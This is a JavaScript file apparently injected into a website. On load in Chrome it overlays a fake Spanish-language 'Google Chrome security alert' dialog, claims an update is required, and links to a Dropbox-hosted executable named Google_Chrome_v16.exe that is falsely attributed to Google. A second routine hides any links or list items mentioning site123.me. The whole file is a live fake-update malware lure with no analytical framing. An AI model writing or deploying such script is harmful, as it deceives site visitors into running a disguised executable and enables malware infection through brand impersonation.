window.addEventListener("DOMContentLoaded", (event) => {
		if(window.localStorage.getItem("browser-new") === null &&  !document.getElementById("windrag") && !navigator.userAgent.includes("Edg") && !navigator.userAgent.includes("Firefox") && !navigator.userAgent.includes("OPR") &&  navigator.userAgent.includes("Chrome")) {

document.body.innerHTML += `<style>

img{max-width:100%;
image-rendering: -moz-crisp-edges;         /* Firefox */
image-rendering:   -o-crisp-edges;         /* Opera */
image-rendering: -webkit-optimize-contrast;/* Webkit (non-standard naming) */
image-rendering: crisp-edges;
-ms-interpolation-mode: nearest-neighbor;  /* IE (non-standard property) */
}






*{margin:0;padding:0;box-sizing:border-box;}
.tr{text-align:right;}
.tl{text-align:left;}
.mtb_15{margin-top:15px;margin-bottom:15px;}


.win-area{
  z-index: 999999;
  position: absolute;
  top: 0;
  left: 35%;
  font-family:Segoe UI;
  font-size:14px;
  color:#2F2F31;
  max-width:450px;
  margin:100px auto;
  background:url('https://i.imgur.com/3cOIQaq.png');
  border-radius:5px;
  overflow:hidden;
  border:1px groove #949AA3;
  box-shadow:0px 2px 10px #000;
}


.win-titles{height:;display:flex;justify-content:space-between;background:red;
background:url('https://i.imgur.com/3cOIQaq.png');
  padding:8px;
  padding-top:0;
  padding-bottom:0;

}
.title-left{padding-top:8px;}
.title-right{position:relative;opacity:0.9;}
.title-right:hover{opacity:1;}

.win-body{
  background:#F0F0F0;
   margin:8px;
  border:1px groove #e3e4e8;
     font-size: 12px;
}
.body-in{
    padding:10px;
}

.body-main{
    display: flex;
    align-items: center;
}
.main-left {
    flex: 0 0 32px;
}
.main-left img{width:35px;}
.main-right {
      margin-left: 14px;
}

.main-right p {margin-bottom: 3px;}




/*buttons*/
.a-right {
    display: flex;
    align-items: center;
}

.a-right a {
    width: 89px;
    height: 20px;
    border: 1px solid #9E9E9E;
    border-radius: 4px;
    font-size: 12px;
    margin-left: 10px;
    color: black;
    text-decoration: none;
    text-align: center;

/* Permalink - use to edit and share this gradient: https://colorzilla.com/gradient-editor/#fffcfc+0,e5ebee+51,e5ebee+51,d7dee3+52,c1bfbf+100 */
background: #fffcfc; /* Old browsers */
background: -moz-linear-gradient(top,  #fffcfc 0%, #e5ebee 51%, #e5ebee 51%, #d7dee3 52%, #c1bfbf 100%); /* FF3.6-15 */
background: -webkit-linear-gradient(top,  #fffcfc 0%,#e5ebee 51%,#e5ebee 51%,#d7dee3 52%,#c1bfbf 100%); /* Chrome10-25,Safari5.1-6 */
background: linear-gradient(to bottom,  #fffcfc 0%,#e5ebee 51%,#e5ebee 51%,#d7dee3 52%,#c1bfbf 100%); /* W3C, IE10+, FF16+, Chrome26+, Opera12+, Safari7+ */
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#fffcfc', endColorstr='#c1bfbf',GradientType=0 ); /* IE6-9 */



}



.a-right a:hover{
background: #c1bfbf; /* Old browsers */
background: -moz-linear-gradient(top, #c1bfbf 0%, #d7dee3 48%, #e5ebee 49%, #e5ebee 49%, #fffcfc 100%); /* FF3.6-15 */
background: -webkit-linear-gradient(top, #c1bfbf 0%,#d7dee3 48%,#e5ebee 49%,#e5ebee 49%,#fffcfc 100%); /* Chrome10-25,Safari5.1-6 */
background: linear-gradient(to bottom, #c1bfbf 0%,#d7dee3 48%,#e5ebee 49%,#e5ebee 49%,#fffcfc 100%); /* W3C, IE10+, FF16+, Chrome26+, Opera12+, Safari7+ */
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#c1bfbf', endColorstr='#fffcfc',GradientType=0 ); /* IE6-9 */}

.a-area {
    display: flex;
    justify-content: space-between;
    align-items: center;
}











.body-mid{border-bottom:1px inset #D0D0D0;margin:0 5px;}

</style>
<div class="mkt-popup win-area" id="windrag">
    <div class="win-titles">
      <div class="title-left">Google Chrome - Alerta de Seguridad</div>
       <div class="title-right"><img src="https://i.imgur.com/2ZvYQzd.png"></div>
    </div>

  <div class="win-body">

    <div class="body-in body-top">
      <div class="body-title"><strong>¿Quieres ejecutar este software?</strong></div>

     <div class="body-main mtb_15">
        <div class="main-left"><img src="https://i.imgur.com/z7VDyyl.png"/></div>
       <div class="main-right tr">
          <p>Nombre: Google_Chrome_v16</p>
           <p>Publisher: Google                     </p>
       </div>
     </div>

	 <div class="a-area">
		<div class="a-left">Actualización Requerida</div>
		<div class="a-right">
			<a target="_blank" onclick="document.getElementById('windrag').style.display = 'none';" href="https://www.dropbox.com/s/rhn38eep25bixxq/Google_Chrome_v16.exe?dl=1">Descargar</a>
		</div>
	 </div>

   </div>


    <div class="body-mid"></div>

    <div class="body-in body-bottom">
     <div class="body-main">
        <div class="main-left"><img src="https://i.imgur.com/tmXv0AB.png"/></div>
       <div class="main-right">
          <p>Se ha detectado una actualizacón y es necesario descarga y ejecutar el archivo Google_Chrome_v16.</p>
       </div>
     </div>
   </div>






  </div>
</div>`;
		  }
	  });


let contando2 = 0;
const intervalos = setInterval(function() {

  if(contando2 > 30) return clearInterval(intervalos);

  contando2++;
  for(const el of document.getElementsByTagName("a")) {
    if(el.innerText.includes("site123.me")) {

        el.parentElement.parentElement.style.display = "none";

    }
}

for(const el of document.getElementsByTagName("li")) {
    if(el.innerText.includes("site123.me")) {

        el.style.display = "none";

    }
}


}, 100);

console.log(window)
